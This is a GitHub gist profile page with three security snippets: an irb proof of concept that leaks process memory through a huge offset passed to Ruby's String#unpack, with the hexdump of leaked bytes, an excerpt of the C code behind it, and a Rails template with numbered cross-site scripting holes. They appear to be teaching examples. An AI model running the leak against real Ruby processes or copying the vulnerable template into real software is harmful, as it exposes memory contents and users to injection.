Skip to content

Instantly share code, notes, and snippets.

Avatar
🎯
Focusing

Paul paulblei

🎯
Focusing
View GitHub Profile
View buffer-under-read-poc.sh
$ irb
irb(main):145:0> leak = 200; size = 2**64-1 - leak + 1 ; puts size ; "BUFF".unpack("@#{size}C#{leak+4}").map { |i| i&.chr }.join.hexdump
18446744073709551416
Offset Hex dump ASCII dump
-------- ----------------------------------------------- ------------------
00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 65 08 93 20 00 00 00 00 |........e.. ....|
00000020 c0 7d 8c 50 97 7f 00 00 53 41 56 45 5f 48 49 53 |.}.P....SAVE_HIS|
View integer-overflow.rb
unsigned long ruby_strtoul(const char *str, char **endptr, int base);
#define STRTOUL(str, endptr, base) (ruby_strtoul((str), (endptr), (base)))
// ....
static VALUE
pack_pack(int argc, VALUE *argv, VALUE ary)
{
// ...
long len, idx, plen;
// ....
@paulblei
paulblei / vulnerable-templating.rb
Created Mar 8, 2018
Vulnerable Ruby on Rails templating
View vulnerable-templating.rb
<div>
<h1>Blog post: <%= @post.title %></h1> (1)
<br />
<a href=<%= @post.url %>>Click here to see the full story</a> (2)
<script>
record_post_view(@post.id); (3)
</script>
<div id=“footer” <%= @post.footer_attr %>>&copy; 2018</div> (4)
</div>